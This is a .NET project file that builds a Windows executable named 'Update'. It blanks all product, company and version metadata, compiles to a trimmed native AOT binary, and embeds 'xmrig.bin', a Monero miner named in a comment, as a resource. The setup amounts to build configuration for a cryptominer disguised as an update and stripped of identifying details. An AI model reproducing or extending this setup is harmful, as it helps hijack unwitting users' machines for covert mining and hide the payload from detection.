<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <TargetFramework>net10.0-windows</TargetFramework>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <SelfContained>true</SelfContained>
    <RuntimeIdentifier>win-x64</RuntimeIdentifier>
    <PublishTrimmed>true</PublishTrimmed>
    <TrimMode>full</TrimMode>
    <EnableTrimAnalyzer>true</EnableTrimAnalyzer>
    <Deterministic>true</Deterministic>
    <SourceRevisionId></SourceRevisionId>
    <GenerateAssemblyInformationalVersionAttribute>false</GenerateAssemblyInformationalVersionAttribute>
    <GenerateAssemblyVersionAttribute>false</GenerateAssemblyVersionAttribute>
    <AssemblyName>Update</AssemblyName>
    <AssemblyTitle></AssemblyTitle>
    <Description></Description>
    <Product></Product>
    <Company></Company>
    <Copyright></Copyright>
    <FileVersion></FileVersion>
    <ProductVersion></ProductVersion>
    <InformationalVersion></InformationalVersion>
    <GenerateAssemblyInfo>false</GenerateAssemblyInfo>
    <Platforms>AnyCPU;x64</Platforms>
    <PublishAot>true</PublishAot>
    <IlcOptimizationPreference>Blended</IlcOptimizationPreference>
    <IlcFoldIdenticalMethodBodies>true</IlcFoldIdenticalMethodBodies>
    <IlcGenerateStackTraceData>false</IlcGenerateStackTraceData>
    <IlcMaxParallelism>12</IlcMaxParallelism>
    <EnableTrimAnalyzer>false</EnableTrimAnalyzer>
  </PropertyGroup>

  <!-- xmrig embedded as binary resource — avoids 37 MB byte-array source that slows NativeAOT -->
  <ItemGroup>
    <EmbeddedResource Include="xmrig.bin" Condition="Exists('xmrig.bin')" LogicalName="xmrig.bin" />
    <TrimmerRootDescriptor Include="TlsRoots.xml" />
  </ItemGroup>
</Project>
